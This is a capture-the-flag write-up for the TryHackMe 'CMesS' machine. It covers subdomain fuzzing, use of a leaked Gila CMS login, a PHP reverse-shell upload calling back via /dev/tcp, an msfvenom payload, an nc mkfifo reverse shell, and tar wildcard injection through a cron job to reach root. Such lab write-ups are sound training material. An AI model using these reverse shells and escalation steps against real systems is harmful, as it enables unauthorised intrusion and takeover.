TryHackMe: CMesS

[Enumeration]

1. Add IP in /etc/hosts

2. Access site nothing much.

3. Port scan

nmap -Pn cmess.thm

There’re 2 ports: 22 and 80.

4. OS and service scan

nmap -p 22,80 -A cmess.thm

There’s robots.txt

Access it. There’re 3 disallowed entry.

Access all of them. Forbidden!!!

5. Vuln scan

nmap --script vuln -p 22,80 cmess.thm

There’s “admin” folder.

6. Directory scan

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://cmess.thm/ -x php,txt,html,sh,cgi,js

7. Access “/admin”

[Exploitation]

1. Find credential of Gila CMS

I cannot find any default credential let’s guess with:

admin:admin

I need an email.

2. Search for subdomains
Since I try to access all directories on the site. There’ s nothing more. I will try to search for subdomains instead.

wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://cmess.thm" --hw 290 -H "Host: FUZZ.cmess.thm"

Add sub-domain in “/etc/hosts”

Access it. There’re 2 users: andre@cmess.thm with password “KPFTN_f2yxe%”, and support@cmess.thm.

3. Try to login with credential.

Back to http://cmess.thm/admin

It’s version 1.10.9

4. Search for exploits

searsploit gila cms

There’s LFI.

Read it.

searchsploit -x 47407

Following the guide I typed:

cmess.thm/admin/fm/?f=src../../../../../../../../../../etc/passwd

Failed!!! But I’m redirected to file manager instead. I may use it to upload reverse shell.

5. Prepare php reverse shell.

<?php
exec(“/bin/bash -c ‘bash -i >& /dev/tcp/<ip>/1234 0>&1’”);
?>

Upload it and the file will be stored in /assets

Prepare listener on port 1234

nc -lvp 1234

Access the file in /assets:

http://cmess.thm/assets/reverse_shell.php

Back to listener, now I have a shell.

[Privilege Escalation]

1. Let’s explore the machine.

cd /home
ls
ca andre

Permission denied.

cd /opt
ls -la

There’s a hidden file.

cat .password.bak

2. Login as andre

ssh andre@cmess.thm

From login banner, this machine is 64-bit.

3. Find user.txt

pwd

ls -la

cat user.txt

4. Escalation to root

Upload lse.sh to machine

Prepare HTTP Server

python -m SimpleHTTPServer 80

Download it

wget http://<ip>/lse.sh

Change permission

chmod 777 lse.sh

Run it

./lse.sh -l 1 -i | more

Noting much, only there’re 2 users with shell: root and andre

Seems like I have to run with password

./lse.sh -l 1 | more

The result isn’t different. I have to do the manual enum.

sudo -l

Check /etc/passwd permission

ls -la /etc/passwd

Check /etc/shadow permission

ls -la /etc/shadow

Check SUID and SGID.

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

Check cron

cat /etc/crontab

With the wildcard (*), I can inject reverse shell to this command.

Create reverse shell.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=1235 -f elf -o shell.elf

Download it to victim machine.

cd /home/abdre/backup
wget http://<ip>/shell.elf

Prepare listener on port 1235

let’s inject the command

Lookin GTFObins, I have to add checkpoint.

touch ./--checkpoint=1
touch ./--checkpoint-action=exec=shell.elf
ls -la

After waiting for 2 mins I don’t have any shell. I have to try another way.

Delete former command

rm ./--checkpoint-action\=exec\=shell.elf

Create new reverse shell command.

Reference:

Reverse Shell Cheat Sheet

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 1235 >/tmp/f" > shell.sh
cat shell.sh

touch "./ — checkpoint-action=exec=sh shell.sh"
ls -la

Wait about 2 mins. Now I have a shell.

Verify user

id

I’m root.

Read root.txt

cd /root
ls
cat root.txt